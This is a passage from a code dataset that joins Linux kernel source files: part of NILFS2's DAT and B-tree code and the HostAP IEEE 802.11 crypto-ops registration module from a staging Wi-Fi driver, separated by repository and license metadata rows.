if (!nilfs_doing_gc() && buffer_nilfs_redirected(entry_bh)) {
bh = nilfs_mdt_get_frozen_buffer(dat, entry_bh);
if (bh) {
WARN_ON(!buffer_uptodate(bh));
brelse(entry_bh);
entry_bh = bh;
}
}
kaddr = kmap_atomic(entry_bh->b_page);
entry = nilfs_palloc_block_get_entry(dat, vblocknr, entry_bh, kaddr);
blocknr = le64_to_cpu(entry->de_blocknr);
if (blocknr == 0) {
ret = -ENOENT;
goto out;
}
*blocknrp = blocknr;
out:
kunmap_atomic(kaddr);
brelse(entry_bh);
return ret;
}
ssize_t nilfs_dat_get_vinfo(struct inode *dat, void *buf, unsigned visz,
size_t nvi)
{
struct buffer_head *entry_bh;
struct nilfs_dat_entry *entry;
struct nilfs_vinfo *vinfo = buf;
__u64 first, last;
void *kaddr;
unsigned long entries_per_block = NILFS_MDT(dat)->mi_entries_per_block;
int i, j, n, ret;
for (i = 0; i < nvi; i += n) {
ret = nilfs_palloc_get_entry_block(dat, vinfo->vi_vblocknr,
0, &entry_bh);
if (ret < 0)
return ret;
kaddr = kmap_atomic(entry_bh->b_page);
/* last virtual block number in this block */
first = vinfo->vi_vblocknr;
do_div(first, entries_per_block);
first *= entries_per_block;
last = first + entries_per_block - 1;
for (j = i, n = 0;
j < nvi && vinfo->vi_vblocknr >= first &&
vinfo->vi_vblocknr <= last;
j++, n++, vinfo = (void *)vinfo + visz) {
entry = nilfs_palloc_block_get_entry(
dat, vinfo->vi_vblocknr, entry_bh, kaddr);
vinfo->vi_start = le64_to_cpu(entry->de_start);
vinfo->vi_end = le64_to_cpu(entry->de_end);
vinfo->vi_blocknr = le64_to_cpu(entry->de_blocknr);
}
kunmap_atomic(kaddr);
brelse(entry_bh);
}
return nvi;
}
/**
* nilfs_dat_read - read or get dat inode
* @sb: super block instance
* @entry_size: size of a dat entry
* @raw_inode: on-disk dat inode
* @inodep: buffer to store the inode
*/
int nilfs_dat_read(struct super_block *sb, size_t entry_size,
struct nilfs_inode *raw_inode, struct inode **inodep)
{
static struct lock_class_key dat_lock_key;
struct inode *dat;
struct nilfs_dat_info *di;
int err;
dat = nilfs_iget_locked(sb, NULL, NILFS_DAT_INO);
if (unlikely(!dat))
return -ENOMEM;
if (!(dat->i_state & I_NEW))
goto out;
err = nilfs_mdt_init(dat, NILFS_MDT_GFP, sizeof(*di));
if (err)
goto failed;
err = nilfs_palloc_init_blockgroup(dat, entry_size);
if (err)
goto failed;
di = NILFS_DAT_I(dat);
lockdep_set_class(&di->mi.mi_sem, &dat_lock_key);
nilfs_palloc_setup_cache(dat, &di->palloc_cache);
nilfs_mdt_setup_shadow_map(dat, &di->shadow);
err = nilfs_read_inode_common(dat, raw_inode);
if (err)
goto failed;
unlock_new_inode(dat);
out:
*inodep = dat;
return 0;
failed:
iget_failed(dat);
return err;
}
| gpl-2.0 |
GustavoRD78/78Kernel-MOB31E.Z1.3657 | drivers/staging/rtl8187se/ieee80211/ieee80211_crypt.c | 5634 | 5621 | /*
* Host AP crypto routines
*
* Copyright (c) 2002-2003, Jouni Malinen <jkmaline@cc.hut.fi>
* Portions Copyright (C) 2004, Intel Corporation <jketreno@linux.intel.com>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* published by the Free Software Foundation. See README and COPYING for
* more details.
*
*/
//#include <linux/config.h>
#include <linux/module.h>
#include <linux/init.h>
#include <linux/slab.h>
#include <asm/string.h>
#include <asm/errno.h>
#include "ieee80211.h"
MODULE_AUTHOR("Jouni Malinen");
MODULE_DESCRIPTION("HostAP crypto");
MODULE_LICENSE("GPL");
struct ieee80211_crypto_alg {
struct list_head list;
struct ieee80211_crypto_ops *ops;
};
struct ieee80211_crypto {
struct list_head algs;
spinlock_t lock;
};
static struct ieee80211_crypto *hcrypt;
void ieee80211_crypt_deinit_entries(struct ieee80211_device *ieee,
int force)
{
struct list_head *ptr, *n;
struct ieee80211_crypt_data *entry;
for (ptr = ieee->crypt_deinit_list.next, n = ptr->next;
ptr != &ieee->crypt_deinit_list; ptr = n, n = ptr->next) {
entry = list_entry(ptr, struct ieee80211_crypt_data, list);
if (atomic_read(&entry->refcnt) != 0 && !force)
continue;
list_del(ptr);
if (entry->ops)
entry->ops->deinit(entry->priv);
kfree(entry);
}
}
void ieee80211_crypt_deinit_handler(unsigned long data)
{
struct ieee80211_device *ieee = (struct ieee80211_device *)data;
unsigned long flags;
spin_lock_irqsave(&ieee->lock, flags);
ieee80211_crypt_deinit_entries(ieee, 0);
if (!list_empty(&ieee->crypt_deinit_list)) {
printk(KERN_DEBUG "%s: entries remaining in delayed crypt "
"deletion list\n", ieee->dev->name);
ieee->crypt_deinit_timer.expires = jiffies + HZ;
add_timer(&ieee->crypt_deinit_timer);
}
spin_unlock_irqrestore(&ieee->lock, flags);
}
void ieee80211_crypt_delayed_deinit(struct ieee80211_device *ieee,
struct ieee80211_crypt_data **crypt)
{
struct ieee80211_crypt_data *tmp;
unsigned long flags;
if (*crypt == NULL)
return;
tmp = *crypt;
*crypt = NULL;
/* must not run ops->deinit() while there may be pending encrypt or
* decrypt operations. Use a list of delayed deinits to avoid needing
* locking. */
spin_lock_irqsave(&ieee->lock, flags);
list_add(&tmp->list, &ieee->crypt_deinit_list);
if (!timer_pending(&ieee->crypt_deinit_timer)) {
ieee->crypt_deinit_timer.expires = jiffies + HZ;
add_timer(&ieee->crypt_deinit_timer);
}
spin_unlock_irqrestore(&ieee->lock, flags);
}
int ieee80211_register_crypto_ops(struct ieee80211_crypto_ops *ops)
{
unsigned long flags;
struct ieee80211_crypto_alg *alg;
if (hcrypt == NULL)
return -1;
alg = kzalloc(sizeof(*alg), GFP_KERNEL);
if (alg == NULL)
return -ENOMEM;
alg->ops = ops;
spin_lock_irqsave(&hcrypt->lock, flags);
list_add(&alg->list, &hcrypt->algs);
spin_unlock_irqrestore(&hcrypt->lock, flags);
printk(KERN_DEBUG "ieee80211_crypt: registered algorithm '%s'\n",
ops->name);
return 0;
}
int ieee80211_unregister_crypto_ops(struct ieee80211_crypto_ops *ops)
{
unsigned long flags;
struct list_head *ptr;
struct ieee80211_crypto_alg *del_alg = NULL;
if (hcrypt == NULL)
return -1;
spin_lock_irqsave(&hcrypt->lock, flags);
for (ptr = hcrypt->algs.next; ptr != &hcrypt->algs; ptr = ptr->next) {
struct ieee80211_crypto_alg *alg =
(struct ieee80211_crypto_alg *) ptr;
if (alg->ops == ops) {
list_del(&alg->list);
del_alg = alg;
break;
}
}
spin_unlock_irqrestore(&hcrypt->lock, flags);
if (del_alg) {
printk(KERN_DEBUG "ieee80211_crypt: unregistered algorithm "
"'%s'\n", ops->name);
kfree(del_alg);
}
return del_alg ? 0 : -1;
}
struct ieee80211_crypto_ops * ieee80211_get_crypto_ops(const char *name)
{
unsigned long flags;
struct list_head *ptr;
struct ieee80211_crypto_alg *found_alg = NULL;
if (hcrypt == NULL)
return NULL;
spin_lock_irqsave(&hcrypt->lock, flags);
for (ptr = hcrypt->algs.next; ptr != &hcrypt->algs; ptr = ptr->next) {
struct ieee80211_crypto_alg *alg =
(struct ieee80211_crypto_alg *) ptr;
if (strcmp(alg->ops->name, name) == 0) {
found_alg = alg;
break;
}
}
spin_unlock_irqrestore(&hcrypt->lock, flags);
if (found_alg)
return found_alg->ops;
else
return NULL;
}
static void * ieee80211_crypt_null_init(int keyidx) { return (void *) 1; }
static void ieee80211_crypt_null_deinit(void *priv) {}
static struct ieee80211_crypto_ops ieee80211_crypt_null = {
.name = "NULL",
.init = ieee80211_crypt_null_init,
.deinit = ieee80211_crypt_null_deinit,
.encrypt_mpdu = NULL,
.decrypt_mpdu = NULL,
.encrypt_msdu = NULL,
.decrypt_msdu = NULL,
.set_key = NULL,
.get_key = NULL,
.extra_prefix_len = 0,
.extra_postfix_len = 0,
.owner = THIS_MODULE,
};
int ieee80211_crypto_init(void)
{
int ret = -ENOMEM;
hcrypt = kzalloc(sizeof(*hcrypt), GFP_KERNEL);
if (!hcrypt)
goto out;
INIT_LIST_HEAD(&hcrypt->algs);
spin_lock_init(&hcrypt->lock);
ret = ieee80211_register_crypto_ops(&ieee80211_crypt_null);
if (ret < 0) {
kfree(hcrypt);
hcrypt = NULL;
}
out:
return ret;
}
void ieee80211_crypto_deinit(void)
{
struct list_head *ptr, *n;
struct ieee80211_crypto_alg *alg = NULL;
if (hcrypt == NULL)
return;
list_for_each_safe(ptr, n, &hcrypt->algs) {
alg = list_entry(ptr, struct ieee80211_crypto_alg, list);
if (alg) {
list_del(ptr);
printk(KERN_DEBUG
"ieee80211_crypt: unregistered algorithm '%s' (deinit)\n",
alg->ops->name);
kfree(alg);
}
}
kfree(hcrypt);
}
| gpl-2.0 |
cherifyass/s4-gpe-kernel | fs/nilfs2/btree.c | 9986 | 61414 | /*
* btree.c - NILFS B-tree.
*
* Copyright (C) 2005-2008 Nippon Telegraph and Telephone Corporation.
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
*
* Written by Koji Sato <koji@osrg.net>.
*/
#include <linux/slab.h>
#include <linux/string.h>
#include <linux/errno.h>
#include <linux/pagevec.h>
#include "nilfs.h"
#include "page.h"
#include "btnode.h"
#include "btree.h"
#include "alloc.h"
#include "dat.h"
static struct nilfs_btree_path *nilfs_btree_alloc_path(void)
{
struct nilfs_btree_path *path;
int level = NILFS_BTREE_LEVEL_DATA;
path = kmem_cache_alloc(nilfs_btree_path_cache, GFP_NOFS);
if (path == NULL)
goto out;
for (; level < NILFS_BTREE_LEVEL_MAX; level++) {
path[level].bp_bh = NULL;
path[level].bp_sib_bh = NULL;
path[level].bp_index = 0;
path[level].bp_oldreq.bpr_ptr = NILFS_BMAP_INVALID_PTR;
path[level].bp_newreq.bpr_ptr = NILFS_BMAP_INVALID_PTR;
path[level].bp_op = NULL;
}
out:
return path;
}
static void nilfs_btree_free_path(struct nilfs_btree_path *path)
{
int level = NILFS_BTREE_LEVEL_DATA;
for (; level < NILFS_BTREE_LEVEL_MAX; level++)
brelse(path[level].bp_bh);
kmem_cache_free(nilfs_btree_path_cache, path);
}
/*
* B-tree node operations
*/
static int nilfs_btree_get_new_block(const struct nilfs_bmap *btree,
__u64 ptr, struct buffer_head **bhp)
{
struct address_space *btnc = &NILFS_BMAP_I(btree)->i_btnode_cache;
struct buffer_head *bh;
bh = nilfs_btnode_create_block(btnc, ptr);
if (!bh)
return -ENOMEM;
set_buffer_nilfs_volatile(bh);
*bhp = bh;
return 0;
}
static int nilfs_btree_node_get_flags(const struct nilfs_btree_node *node)
{
return node->bn_flags;
}
static void
nilfs_btree_node_set_flags(struct nilfs_btree_node *node, int flags)
{
node->bn_flags = flags;
}
static int nilfs_btree_node_root(const struct nilfs_btree_node *node)
{
return nilfs_btree_node_get_flags(node) & NILFS_BTREE_NODE_ROOT;
}
static int nilfs_btree_node_get_level(const struct nilfs_btree_node *node)
{
return node->bn_level;
}
static void
nilfs_btree_node_set_level(struct nilfs_btree_node *node, int level)
{
node->bn_level = level;
}
static int nilfs_btree_node_get_nchildren(const struct nilfs_btree_node *node)
{
return le16_to_cpu(node->bn_nchildren);
}
static void
nilfs_btree_node_set_nchildren(struct nilfs_btree_node *node, int nchildren)
{
node->bn_nchildren = cpu_to_le16(nchildren);
}
static int nilfs_btree_node_size(const struct nilfs_bmap *btree)
{
return 1 << btree->b_inode->i_blkbits;
}
static int nilfs_btree_nchildren_per_block(const struct nilfs_bmap *btree)
{
return btree->b_nchildren_per_block;
}
static __le64 *
nilfs_btree_node_dkeys(const struct nilfs_btree_node *node)
{
return (__le64 *)((char *)(node + 1) +
(nilfs_btree_node_root(node) ?
0 : NILFS_BTREE_NODE_EXTRA_PAD_SIZE));
}
static __le64 *
nilfs_btree_node_dptrs(const struct nilfs_btree_node *node, int ncmax)
{
return (__le64 *)(nilfs_btree_node_dkeys(node) + ncmax);
}
static __u64
nilfs_btree_node_get_key(const struct nilfs_btree_node *node, int index)
{
return le64_to_cpu(*(nilfs_btree_node_dkeys(node) + index));
}
static void
nilfs_btree_node_set_key(struct nilfs_btree_node *node, int index, __u64 key)
{
*(nilfs_btree_node_dkeys(node) + index) = cpu_to_le64(key);
}
static __u64
nilfs_btree_node_get_ptr(const struct nilfs_btree_node *node, int index,
int ncmax)
{
return le64_to_cpu(*(nilfs_btree_node_dptrs(node, ncmax) + index));
}
static void
nilfs_btree_node_set_ptr(struct nilfs_btree_node *node, int index, __u64 ptr,
int ncmax)
{
*(nilfs_btree_node_dptrs(node, ncmax) + index) = cpu_to_le64(ptr);
}
static void nilfs_btree_node_init(struct nilfs_btree_node *node, int flags,
int level, int nchildren, int ncmax,
const __u64 *keys, const __u64 *ptrs)
{
__le64 *dkeys;
__le64 *dptrs;
int i;
nilfs_btree_node_set_flags(node, flags);
nilfs_btree_node_set_level(node, level);
nilfs_btree_node_set_nchildren(node, nchildren);
dkeys = nilfs_btree_node_dkeys(node);
dptrs = nilfs_btree_node_dptrs(node, ncmax);
for (i = 0; i < nchildren; i++) {
dkeys[i] = cpu_to_le64(keys[i]);
dptrs[i] = cpu_to_le64(ptrs[i]);
}
}
/* Assume the buffer heads corresponding to left and right are locked. */
static void nilfs_btree_node_move_left(struct nilfs_btree_node *left,
struct nilfs_btree_node *right,
int n, int lncmax, int rncmax)
{
__le64 *ldkeys, *rdkeys;
__le64 *ldptrs, *rdptrs;
int lnchildren, rnchildren;
ldkeys = nilfs_btree_node_dkeys(left);
ldptrs = nilfs_btree_node_dptrs(left, lncmax);
lnchildren = nilfs_btree_node_get_nchildren(left);
rdkeys = nilfs_btree_node_dkeys(right);
rdptrs = nilfs_btree_node_dptrs(right, rncmax);
rnchildren = nilfs_btree_node_get_nchildren(right);
memcpy(ldkeys + lnchildren, rdkeys, n * sizeof(*rdkeys));
memcpy(ldptrs + lnchildren, rdptrs, n * sizeof(*rdptrs));
memmove(rdkeys, rdkeys + n, (rnchildren - n) * sizeof(*rdkeys));
memmove(rdptrs, rdptrs + n, (rnchildren - n) * sizeof(*rdptrs));
lnchildren += n;
rnchildren -= n;
nilfs_btree_node_set_nchildren(left, lnchildren);
nilfs_btree_node_set_nchildren(right, rnchildren);
}
/* Assume that the buffer heads corresponding to left and right are locked. */
static void nilfs_btree_node_move_right(struct nilfs_btree_node *left,
struct nilfs_btree_node *right,
int n, int lncmax, int rncmax)
{
__le64 *ldkeys, *rdkeys;
__le64 *ldptrs, *rdptrs;
int lnchildren, rnchildren;
ldkeys = nilfs_btree_node_dkeys(left);
ldptrs = nilfs_btree_node_dptrs(left, lncmax);
lnchildren = nilfs_btree_node_get_nchildren(left);
rdkeys = nilfs_btree_node_dkeys(right);
rdptrs = nilfs_btree_node_dptrs(right, rncmax);
rnchildren = nilfs_btree_node_get_nchildren(right);
memmove(rdkeys + n, rdkeys, rnchildren * sizeof(*rdkeys));
memmove(rdptrs + n, rdptrs, rnchildren * sizeof(*rdptrs));
memcpy(rdkeys, ldkeys + lnchildren - n, n * sizeof(*rdkeys));
memcpy(rdptrs, ldptrs + lnchildren - n, n * sizeof(*rdptrs));
lnchildren -= n;
rnchildren += n;
nilfs_btree_node_set_nchildren(left, lnchildren);
nilfs_btree_node_set_nchildren(right, rnchildren);
}
/* Assume that the buffer head corresponding to node is locked. */
static void nilfs_btree_node_insert(struct nilfs_btree_node *node, int index,
__u64 key, __u64 ptr, int ncmax)
{
__le64 *dkeys;
__le64 *dptrs;
int nchildren;
dkeys = nilfs_btree_node_dkeys(node);
dptrs = nilfs_btree_node_dptrs(node, ncmax);
nchildren = nilfs_btree_node_get_nchildren(node);
if (index < nchildren) {
memmove(dkeys + index + 1, dkeys + index,
(nchildren - index) * sizeof(*dkeys));
memmove(dptrs + index + 1, dptrs + index,
(nchildren - index) * sizeof(*dptrs));
}
dkeys[index] = cpu_to_le64(key);
dptrs[index] = cpu_to_le64(ptr);
nchildren++;
nilfs_btree_node_set_nchildren(node, nchildren);
}
/* Assume that the buffer head corresponding to node is locked. */
static void nilfs_btree_node_delete(struct nilfs_btree_node *node, int index,
__u64 *keyp, __u64 *ptrp, int ncmax)
{
__u64 key;
__u64 ptr;
__le64 *dkeys;
__le64 *dptrs;
int nchildren;
dkeys = nilfs_btree_node_dkeys(node);
dptrs = nilfs_btree_node_dptrs(node, ncmax);
key = le64_to_cpu(dkeys[index]);
ptr = le64_to_cpu(dptrs[index]);
nchildren = nilfs_btree_node_get_nchildren(node);
if (keyp != NULL)
*keyp = key;
if (ptrp != NULL)
*ptrp = ptr;
if (index < nchildren - 1) {
memmove(dkeys + index, dkeys + index + 1,
(nchildren - index - 1) * sizeof(*dkeys));
memmove(dptrs + index, dptrs + index + 1,
(nchildren - index - 1) * sizeof(*dptrs));
}
nchildren--;
nilfs_btree_node_set_nchildren(node, nchildren);
}
static int nilfs_btree_node_lookup(const struct nilfs_btree_node *node,
__u64 key, int *indexp)
{
__u64 nkey;
int index, low, high, s;
/* binary search */
low = 0;
high = nilfs_btree_node_get_nchildren(node) - 1;
index = 0;
s = 0;
while (low <= high) {
index = (low + high) / 2;
nkey = nilfs_btree_node_get_key(node, index);
if (nkey == key) {
s = 0;
goto out;
} else if (nkey < key) {
low = index + 1;
s = -1;
} else {
high = index - 1;
s = 1;
}
}
/* adjust index */
if (nilfs_btree_node_get_level(node) > NILFS_BTREE_LEVEL_NODE_MIN) {
if (s > 0 && index > 0)
index--;
} else if (s < 0)
index++;
out:
*indexp = index;
return s == 0;
}
/**
* nilfs_btree_node_broken - verify consistency of btree node
* @node: btree node block to be examined
* @size: node size (in bytes)
* @blocknr: block number
*
* Return Value: If node is broken, 1 is returned. Otherwise, 0 is returned.
*/
static int nilfs_btree_node_broken(const struct nilfs_btree_node *node,
size_t size, sector_t blocknr)
{
int level, flags, nchildren;
int ret = 0;
level = nilfs_btree_node_get_level(node);
flags = nilfs_btree_node_get_flags(node);
nchildren = nilfs_btree_node_get_nchildren(node);
if (unlikely(level < NILFS_BTREE_LEVEL_NODE_MIN ||
level >= NILFS_BTREE_LEVEL_MAX ||
(flags & NILFS_BTREE_NODE_ROOT) ||
nchildren < 0 ||
nchildren > NILFS_BTREE_NODE_NCHILDREN_MAX(size))) {
printk(KERN_CRIT "NILFS: bad btree node (blocknr=%llu): "
"level = %d, flags = 0x%x, nchildren = %d\n",
(unsigned long long)blocknr, level, flags, nchildren);
ret = 1;
}
return ret;
}
int nilfs_btree_broken_node_block(struct buffer_head *bh)
{
int ret;
if (buffer_nilfs_checked(bh))
return 0;
ret = nilfs_btree_node_broken((struct nilfs_btree_node *)bh->b_data,
bh->b_size, bh->b_blocknr);
if (likely(!ret))
set_buffer_nilfs_checked(bh);
return ret;
}
static struct nilfs_btree_node *
nilfs_btree_get_root(const struct nilfs_bmap *btree)
{
return (struct nilfs_btree_node *)btree->b_u.u_data;
}
static struct nilfs_btree_node *
nilfs_btree_get_nonroot_node(const struct nilfs_btree_path *path, int level)
{
return (struct nilfs_btree_node *)path[level].bp_bh->b_data;
}
static struct nilfs_btree_node *
nilfs_btree_get_sib_node(const struct nilfs_btree_path *path, int level)
{
return (struct nilfs_btree_node *)path[level].bp_sib_bh->b_data;
}
static int nilfs_btree_height(const struct nilfs_bmap *btree)
{
return nilfs_btree_node_get_level(nilfs_btree_get_root(btree)) + 1;
}
static struct nilfs_btree_node *
nilfs_btree_get_node(const struct nilfs_bmap *btree,
const struct nilfs_btree_path *path,
int level, int *ncmaxp)
{
struct nilfs_btree_node *node;
if (level == nilfs_btree_height(btree) - 1) {
node = nilfs_btree_get_root(btree);
*ncmaxp = NILFS_BTREE_ROOT_NCHILDREN_MAX;
} else {
node = nilfs_btree_get_nonroot_node(path, level);
*ncmaxp = nilfs_btree_nchildren_per_block(btree);
}
return node;
}
static int
nilfs_btree_bad_node(struct nilfs_btree_node *node, int level)
{
if (unlikely(nilfs_btree_node_get_level(node) != level)) {
dump_stack();
printk(KERN_CRIT "NILFS: btree level mismatch: %d != %d\n",
nilfs_btree_node_get_level(node), level);
return 1;
}
return 0;
}
struct nilfs_btree_readahead_info {
struct nilfs_btree_node *node; /* parent node */
int max_ra_blocks; /* max nof blocks to read ahead */
int index; /* current index on the parent node */
int ncmax; /* nof children in the parent node */
};
static int __nilfs_btree_get_block(const struct nilfs_bmap *btree, __u64 ptr,
struct buffer_head **bhp,
const struct nilfs_btree_readahead_info *ra)
{
struct address_space *btnc = &NILFS_BMAP_I(btree)->i_btnode_cache;
struct buffer_head *bh, *ra_bh;
sector_t submit_ptr = 0;
int ret;
ret = nilfs_btnode_submit_block(btnc, ptr, 0, READ, &bh, &submit_ptr);
if (ret) {
if (ret != -EEXIST)
return ret;
goto out_check;
}
if (ra) {
int i, n;
__u64 ptr2;
/* read ahead sibling nodes */
for (n = ra->max_ra_blocks, i = ra->index + 1;
n > 0 && i < ra->ncmax; n--, i++) {
ptr2 = nilfs_btree_node_get_ptr(ra->node, i, ra->ncmax);
ret = nilfs_btnode_submit_block(btnc, ptr2, 0, READA,
&ra_bh, &submit_ptr);
if (likely(!ret || ret == -EEXIST))
brelse(ra_bh);
else if (ret != -EBUSY)
break;
if (!buffer_locked(bh))
goto out_no_wait;
}
}
wait_on_buffer(bh);
out_no_wait:
if (!buffer_uptodate(bh)) {
brelse(bh);
return -EIO;
}
out_check:
if (nilfs_btree_broken_node_block(bh)) {
clear_buffer_uptodate(bh);
brelse(bh);
return -EINVAL;
}
*bhp = bh;
return 0;
}
static int nilfs_btree_get_block(const struct nilfs_bmap *btree, __u64 ptr,
struct buffer_head **bhp)
{
return __nilfs_btree_get_block(btree, ptr, bhp, NULL);
}
static int nilfs_btree_do_lookup(const struct nilfs_bmap *btree,
struct nilfs_btree_path *path,
__u64 key, __u64 *ptrp, int minlevel,
int readahead)
{
struct nilfs_btree_node *node;
struct nilfs_btree_readahead_info p, *ra;
__u64 ptr;
int level, index, found, ncmax, ret;
node = nilfs_btree_get_root(btree);
level = nilfs_btree_node_get_level(node);
if (level < minlevel || nilfs_btree_node_get_nchildren(node) <= 0)
return -ENOENT;
found = nilfs_btree_node_lookup(node, key, &index);
ptr = nilfs_btree_node_get_ptr(node, index,
NILFS_BTREE_ROOT_NCHILDREN_MAX);
path[level].bp_bh = NULL;
path[level].bp_index = index;
ncmax = nilfs_btree_nchildren_per_block(btree);
while (--level >= minlevel) {
ra = NULL;
if (level == NILFS_BTREE_LEVEL_NODE_MIN && readahead) {
p.node = nilfs_btree_get_node(btree, path, level + 1,
&p.ncmax);
p.index = index;
p.max_ra_blocks = 7;
ra = &p;
}
ret = __nilfs_btree_get_block(btree, ptr, &path[level].bp_bh,
ra);
if (ret < 0)
return ret;
node = nilfs_btree_get_nonroot_node(path, level);
if (nilfs_btree_bad_node(node, level))
return -EINVAL;
if (!found)
found = nilfs_btree_node_lookup(node, key, &index);
else
index = 0;
if (index < ncmax) {
ptr = nilfs_btree_node_get_ptr(node, index, ncmax);
} else {
WARN_ON(found || level != NILFS_BTREE_LEVEL_NODE_MIN);
/* insert */
ptr = NILFS_BMAP_INVALID_PTR;
}
path[level].bp_index = index;
}
if (!found)
return -ENOENT;
if (ptrp != NULL)
*ptrp = ptr;
return 0;
}
static int nilfs_btree_do_lookup_last(const struct nilfs_bmap *btree,
struct nilfs_btree_path *path,
__u64 *keyp, __u64 *ptrp)
{
struct nilfs_btree_node *node;
__u64 ptr;
int index, level, ncmax, ret;
node = nilfs_btree_get_root(btree);
index = nilfs_btree_node_get_nchildren(node) - 1;
if (index < 0)
return -ENOENT;
level = nilfs_btree_node_get_level(node);
ptr = nilfs_btree_node_get_ptr(node, index,
NILFS_BTREE_ROOT_NCHILDREN_MAX);
path[level].bp_bh = NULL;
path[level].bp_index = index;
ncmax = nilfs_btree_nchildren_per_block(btree);
for (level--; level > 0; level--) {
ret = nilfs_btree_get_block(btree, ptr, &path[level].bp_bh);
if (ret < 0)
return ret;
node = nilfs_btree_get_nonroot_node(path, level);
if (nilfs_btree_bad_node(node, level))
return -EINVAL;
index = nilfs_btree_node_get_nchildren(node) - 1;
ptr = nilfs_btree_node_get_ptr(node, index, ncmax);
path[level].bp_index = index;
}
if (keyp != NULL)
*keyp = nilfs_btree_node_get_key(node, index);
if (ptrp != NULL)
*ptrp = ptr;
return 0;
}
static int nilfs_btree_lookup(const struct nilfs_bmap *btree,
__u64 key, int level, __u64 *ptrp)
{
struct nilfs_btree_path *path;
int ret;
path = nilfs_btree_alloc_path();
if (path == NULL)
return -ENOMEM;
ret = nilfs_btree_do_lookup(btree, path, key, ptrp, level, 0);
nilfs_btree_free_path(path);
return ret;
}
static int nilfs_btree_lookup_contig(const struct nilfs_bmap *btree,
__u64 key, __u64 *ptrp, unsigned maxblocks)
{
struct nilfs_btree_path *path;
struct nilfs_btree_node *node;
struct inode *dat = NULL;
__u64 ptr, ptr2;
sector_t blocknr;
int level = NILFS_BTREE_LEVEL_NODE_MIN;
int ret, cnt, index, maxlevel, ncmax;
struct nilfs_btree_readahead_info p;
path = nilfs_btree_alloc_path();
if (path == NULL)
return -ENOMEM;
ret = nilfs_btree_do_lookup(btree, path, key, &ptr, level, 1);
if (ret < 0)
goto out;
if (NILFS_BMAP_USE_VBN(btree)) {
dat = nilfs_bmap_get_dat(btree);
ret = nilfs_dat_translate(dat, ptr, &blocknr);
if (ret < 0)
goto out;
ptr = blocknr;
}
cnt = 1;
if (cnt == maxblocks)
goto end;
maxlevel = nilfs_btree_height(btree) - 1;
node = nilfs_btree_get_node(btree, path, level, &ncmax);
index = path[level].bp_index + 1;
for (;;) {
while (index < nilfs_btree_node_get_nchildren(node)) {
if (nilfs_btree_node_get_key(node, index) !=
key + cnt)
goto end;
ptr2 = nilfs_btree_node_get_ptr(node, index, ncmax);
if (dat) {
ret = nilfs_dat_translate(dat, ptr2, &blocknr);
if (ret < 0)
goto out;
ptr2 = blocknr;
}
if (ptr2 != ptr + cnt || ++cnt == maxblocks)
goto end;
index++;
continue;
}
if (level == maxlevel)
break;
/* look-up right sibling node */
p.node = nilfs_btree_get_node(btree, path, level + 1, &p.ncmax);
p.index = path[level + 1].bp_index + 1;
p.max_ra_blocks = 7;
if (p.index >= nilfs_btree_node_get_nchildren(p.node) ||
nilfs_btree_node_get_key(p.node, p.index) != key + cnt)
break;
ptr2 = nilfs_btree_node_get_ptr(p.node, p.index, p.ncmax);
path[level + 1].bp_index = p.index;
brelse(path[level].bp_bh);
path[level].bp_bh = NULL;
ret = __nilfs_btree_get_block(btree, ptr2, &path[level].bp_bh,
&p);
if (ret < 0)
goto out;
node = nilfs_btree_get_nonroot_node(path, level);
ncmax = nilfs_btree_nchildren_per_block(btree);
index = 0;
path[level].bp_index = index;
}
end:
*ptrp = ptr;
ret = cnt;
out:
nilfs_btree_free_path(path);
return ret;
}
static void nilfs_btree_promote_key(struct nilfs_bmap *btree,
struct nilfs_btree_path *path,
int level, __u64 key)
{
if (level < nilfs_btree_height(btree) - 1) {
do {
nilfs_btree_node_set_key(
nilfs_btree_get_nonroot_node(path, level),
path[level].bp_index, key);
if (!buffer_dirty(path[level].bp_bh))
mark_buffer_dirty(path[level].bp_bh);
} while ((path[level].bp_index == 0) &&
(++level < nilfs_btree_height(btree) - 1));
}
/* root */
if (level == nilfs_btree_height(btree) - 1) {
nilfs_btree_node_set_key(nilfs_btree_get_root(btree),
path[level].bp_index, key);
}
}
static void nilfs_btree_do_insert(struct nilfs_bmap *btree,
struct nilfs_btree_path *path,
int level, __u64 *keyp, __u64 *ptrp)
{
struct nilfs_btree_node *node;
int ncblk;
if (level < nilfs_btree_height(btree) - 1) {
node = nilfs_btree_get_nonroot_node(path, level);
ncblk = nilfs_btree_nchildren_per_block(btree);
nilfs_btree_node_insert(node, path[level].bp_index,
*keyp, *ptrp, ncblk);
if (!buffer_dirty(path[level].bp_bh))
mark_buffer_dirty(path[level].bp_bh);
if (path[level].bp_index == 0)
nilfs_btree_promote_key(btree, path, level + 1,
nilfs_btree_node_get_key(node,
0));
} else {
node = nilfs_btree_get_root(btree);
nilfs_btree_node_insert(node, path[level].bp_index,
*keyp, *ptrp,
NILFS_BTREE_ROOT_NCHILDREN_MAX);
}
}
static void nilfs_btree_carry_left(struct nilfs_bmap *btree,
struct nilfs_btree_path *path,
int level, __u64 *keyp, __u64 *ptrp)
{
struct nilfs_btree_node *node, *left;
int nchildren, lnchildren, n, move, ncblk;
node = nilfs_btree_get_nonroot_node(path, level);
left = nilfs_btree_get_sib_node(path, level);
nchildren = nilfs_btree_node_get_nchildren(node);
lnchildren = nilfs_btree_node_get_nchildren(left);
ncblk = nilfs_btree_nchildren_per_block(btree);
move = 0;
n = (nchildren + lnchildren + 1) / 2 - lnchildren;
if (n > path[level].bp_index) {
/* move insert point */
n--;
move = 1;
}
nilfs_btree_node_move_left(left, node, n, ncblk, ncblk);
if (!buffer_dirty(path[level].bp_bh))
mark_buffer_dirty(path[level].bp_bh);
if (!buffer_dirty(path[level].bp_sib_bh))
mark_buffer_dirty(path[level].bp_sib_bh);
nilfs_btree_promote_key(btree, path, level + 1,
nilfs_btree_node_get_key(node, 0));
if (move) {
brelse(path[level].bp_bh);
path[level].bp_bh = path[level].bp_sib_bh;
path[level].bp_sib_bh = NULL;
path[level].bp_index += lnchildren;
path[level + 1].bp_index--;
} else {
brelse(path[level].bp_sib_bh);
path[level].bp_sib_bh = NULL;
